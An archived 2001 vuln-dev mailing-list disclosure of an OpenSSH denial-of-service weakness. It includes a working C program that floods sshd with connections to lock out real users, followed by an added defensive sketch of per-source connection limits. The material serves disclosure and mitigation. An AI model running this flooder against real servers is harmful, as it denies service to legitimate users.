Possible OpenSSH DoS Attack

From: Pedro Inacio (drbrain@phibernet.org)
Date: 12/11/01


From: "Pedro Inacio" <drbrain@phibernet.org>
To: <vuln-dev@securityfocus.com>
Date: Mon, 10 Dec 2001 23:19:18 -0000


--[ OpenSSH DoS Attack proof of concept ]--
  by DrBrain <drbrain@phibernet.org> / http://www.phibernet.org

--[ Intro ]--

After some tests with sshd, I have noticed that it is possible to generate a
DoS attack that gives you the following message when you try to contact the
service:

----------
$ ssh user@somehost.com
ssh_exchange_identification: Connection closed by remote host
----------

This just happens while running the code below, because when you stop
running it everything works fine.

It seems to be a known problem (
http://www.snailbook.com/faq/libwrap-oops.auto.html ), but until now there
is no patch available and this problem is present in all OpenSSH versions.

Although, there is an advisory to compile the SSH server with libwrap
(TCP-wrappers) support and then add some rules in /etc/hosts.{allow,deny} in
order to allow connections to sshd from any source address.

Anyway, I have made some tests and ALL the machines were vulnerable.
In my opinion it is urgent to fix this as soon as possible.

--[ Code ]--

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>   /* exit(), atoi() */
#include <string.h>   /* memcpy() */
#include <unistd.h>

int main (int argc, char *argv[]) {

  int sd, rc;
  struct sockaddr_in localAddr, servAddr;
  struct linger ling;
  struct hostent *h;

  if(argc < 3) {
    printf("tunga.c - OpenSSH DoS Attack\n");
    printf("by DrBrain <drbrain@phibernet.org>\n");
    printf("Phibernet Information Network < http://www.phibernet.org >\n\n");
    printf("Usage: %s <victim> <port>\n\n",argv[0]);
    exit(1);
  }

  h = gethostbyname(argv[1]);
  if(h==NULL) {
    printf("%s: Unknown Host '%s'\n",argv[0],argv[1]);
    exit(1);
  }

  for(;;) {
    servAddr.sin_family = h->h_addrtype;
    memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
    servAddr.sin_port = htons(atoi(argv[2]));

    sd = socket(AF_INET, SOCK_STREAM, 0);
    if(sd<0) {
      perror("Cannot Open Socket ");
      exit(1);
    }

    rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
    if(rc<0) {
      perror("Cannot Connect ");
      exit(1);
    }
  }
  exit(0);
}

That's it!

I would like to thank megas and FatZU and all the guys in Phibernet for
helping me with some machines while testing the DoS.

-- DrBrain
"If you don't have a hammer, hack it" ;)
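
Added example, not part of the original post and not OpenSSH code: a sketch of server-side admission control for unauthenticated connections, showing why a single global cap (sshd's MaxStartups option is a limit of this kind) lets one address shut everyone else out, and how a per-source cap avoids that. The names pending_table, admit, release and legit_admitted_after_flood, the table size and the cap values are hypothetical; the addresses are constructed values from the documentation ranges.

```c
#include <stdint.h>
#include <string.h>

#define MAX_SOURCES 64            /* table size: an assumption of this sketch */

struct pending_table {
    int global_cap;               /* unauthenticated connections allowed in total */
    int per_source_cap;           /* unauthenticated connections allowed per address */
    int total;
    struct { uint32_t addr; int count; } src[MAX_SOURCES];
};

void table_init(struct pending_table *t, int global_cap, int per_source_cap) {
    memset(t, 0, sizeof(*t));
    t->global_cap = global_cap; t->per_source_cap = per_source_cap;
}

/* Index of the slot tracking addr, else a free slot, else -1 (table full). */
static int find_slot(const struct pending_table *t, uint32_t addr) {
    int free_slot = -1;
    for (int i = 0; i < MAX_SOURCES; i++) {
        if (t->src[i].count > 0 && t->src[i].addr == addr) return i;
        if (t->src[i].count == 0 && free_slot < 0) free_slot = i;
    }
    return free_slot;
}

/* Call after accept(): 1 = keep the connection, 0 = close it immediately. */
int admit(struct pending_table *t, uint32_t addr) {
    int i = find_slot(t, addr);
    if (i < 0 || t->total >= t->global_cap) return 0;
    if (t->src[i].count >= t->per_source_cap) return 0;
    t->src[i].addr = addr; t->src[i].count++; t->total++;
    return 1;
}

/* Call when a pending connection authenticates, times out or closes. */
void release(struct pending_table *t, uint32_t addr) {
    int i = find_slot(t, addr);
    if (i >= 0 && t->src[i].count > 0) { t->src[i].count--; t->total--; }
}

/* Constructed scenario: 192.0.2.1 opens 100 idle connections, then
   198.51.100.7 connects. Returns 1 if the second client is admitted. */
int legit_admitted_after_flood(int global_cap, int per_source_cap) {
    struct pending_table t;
    table_init(&t, global_cap, per_source_cap);
    for (int i = 0; i < 100; i++) admit(&t, 0xC0000201u);
    return admit(&t, 0xC6336407u);
}
```

With a global cap of 10 and no tighter per-source cap, the second client is refused, which matches the "Connection closed by remote host" symptom above; with a per-source cap of 3 it is admitted.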


